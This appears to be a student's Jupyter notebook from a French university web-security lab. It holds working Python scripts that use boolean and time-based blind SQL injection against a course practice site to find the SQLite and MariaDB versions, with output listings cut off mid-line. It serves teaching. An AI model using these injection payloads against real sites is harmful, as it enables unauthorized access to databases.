# ipl I317B Sécurité : labos
## Semaine 5 : Vulnérabilitées web (2)

### Exercice 1:
Revenons un peux en arrière sur le site de notre mauvais développeur. Nous savons que le site utilise sqlite comme système de gestion de base de donnée mais nous aimerions en identifier la version. Utilisez le site de l'exercice 1 pour récupérer cette information.

https://labosecuipl.alwaysdata.net/23/s02/ex1a/

In [1]:
import requests
from bs4 import BeautifulSoup

def test_sqli(test):
    page = requests.post(
        "http://labosecuipl.alwaysdata.net/23/s02/ex1a/",
        data={
            "login": "",
            "password": '" or ' + test + ';--'
        }
    )
    return "Good job" in page.text

def get_all_versions():
    """
    sqlite dispose d'une page reprennant toutes les versions possibles.
    Ça nous facilite la vie.
    """
    page = requests.get("https://www.sqlite.org/chronology.html")
    soup = BeautifulSoup(page.text)
    
    all_versions = []
    for tr in soup.find_all("tr")[1:]:
        all_versions.append(tr.find_all('td')[1].text)

    return all_versions

for version in get_all_versions():
    injection = "sqlite_version()='" + version + "'"
    print(injection, end=" ")
    
    if test_sqli(injection):
        print("Trouvé !")
        print(version)
        break
    else:
        print("Non ...")

sqlite_version()='3.44.0' Non ...
sqlite_version()='3.43.2' Non ...
sqlite_version()='3.43.1' Non ...
sqlite_version()='3.43.0' Non ...
sqlite_version()='3.42.0' Non ...
sqlite_version()='3.41.2' Non ...
sqlite_version()='3.41.1' Non ...
sqlite_version()='3.41.0' Non ...
sqlite_version()='3.40.1' Non ...
sqlite_version()='3.40.0' Non ...
sqlite_version()='3.39.4' Non ...
sqlite_version()='3.39.3' Non ...
sqlite_version()='3.39.2' Non ...
sqlite_version()='3.39.1' Non ...
sqlite_version()='3.39.0' Non ...
sqlite_version()='3.38.5' Non ...
sqlite_version()='3.38.4' Non ...
sqlite_version()='3.38.3' Non ...
sqlite_version()='3.38.2' Non ...
sqlite_version()='3.38.1' Non ...
sqlite_version()='3.38.0' Non ...
sqlite_version()='3.37.2' Non ...
sqlite_version()='3.37.1' Non ...
sqlite_version()='3.37.0' Non ...
sqlite_version()='3.36.0' Non ...
sqlite_version()='3.35.5' Non ...
sqlite_version()='3.35.4' Non ...
sqlite_version()='3.35.3' Non ...
sqlite_version()='3.35.2' Non ...
sqlite_version

### Exercice 2:
Pour ce dernier exercice, vous allez travailler un peu à l'aveugle. En effet, la page suicitant notre intérêt cette fois-ci ne contient pas grand chose à part à un bouton ... mais elle est injectable (promis) !

À vous de trouvez comment et de récupérer la version du système de gestion de base de donnée : https://labosecuipl.alwaysdata.net/23/s04/ex2/

Tips:
  - Cette fois-ci, c'est plus du sqlite : https://mariadb.com/kb/en/version/
  - Et vous travaillez à l'aveugle ;-)

In [13]:
import time


def get_all_maria_versions():
    req = requests.get("https://mariadb.org/mariadb/all-releases/")
    soup = BeautifulSoup(req.text)
    
    all_versions = []
    
    def download_href(href):
        return href and href.startswith("https://mariadb.org/download/")
    
    for version in soup.find("div", {"class": "entry-content"}).find_all("a", href=download_href):
        all_versions.append(version.text + "-MariaDB")
    
    return all_versions

def test_sqli_blind(test):
    start = time.time()
    page = requests.post(
        "http://labosecuipl.alwaysdata.net/23/s04/ex2/",
        data={
            "id": "15 AND (" + test + " AND sleep(5));--",
        }
    )
    if (time.time()-start) > 5:  # un requête normal non-sleepé mettra largement moins de 5 secondes.
        return True
    else:
        return False

In [12]:
for version in get_all_maria_versions():
    injection = "VERSION()='" + version + "'"
    print(injection, end=" ")
    
    if test_sqli_blind(injection):
        print("Trouvé !")
        print(version)
        break
    else:
        print("Non ...")

VERSION()='11.3.0-MariaDB' Non ...
VERSION()='11.2.1-MariaDB' Non ...
VERSION()='11.2.0-MariaDB' Non ...
VERSION()='11.1.2-MariaDB' Non ...
VERSION()='11.1.1-MariaDB' Non ...
VERSION()='11.1.0-MariaDB' Non ...
VERSION()='11.0.3-MariaDB' Non ...
VERSION()='11.0.2-MariaDB' Non ...
VERSION()='11.0.1-MariaDB' Non ...
VERSION()='11.0.0-MariaDB' Non ...
VERSION()='10.11.5-MariaDB' Non ...
VERSION()='10.11.4-MariaDB' Non ...
VERSION()='10.11.3-MariaDB' Non ...
VERSION()='10.11.2-MariaDB' Non ...
VERSION()='10.11.1-MariaDB' Non ...
VERSION()='10.11.0-MariaDB' Non ...
VERSION()='10.10.6-MariaDB' Non ...
VERSION()='10.10.5-MariaDB' Non ...
VERSION()='10.10.4-MariaDB' Non ...
VERSION()='10.10.3-MariaDB' Non ...
VERSION()='10.10.2-MariaDB' Non ...
VERSION()='10.10.1-MariaDB' Non ...
VERSION()='10.10.0-MariaDB' Non ...
VERSION()='10.9.8-MariaDB' Non ...
VERSION()='10.9.7-MariaDB' Non ...
VERSION()='10.9.6-MariaDB' Non ...
VERSION()='10.9.5-MariaDB' Non ...
VERSION()='10.9.4-MariaDB' Non ...
VERSION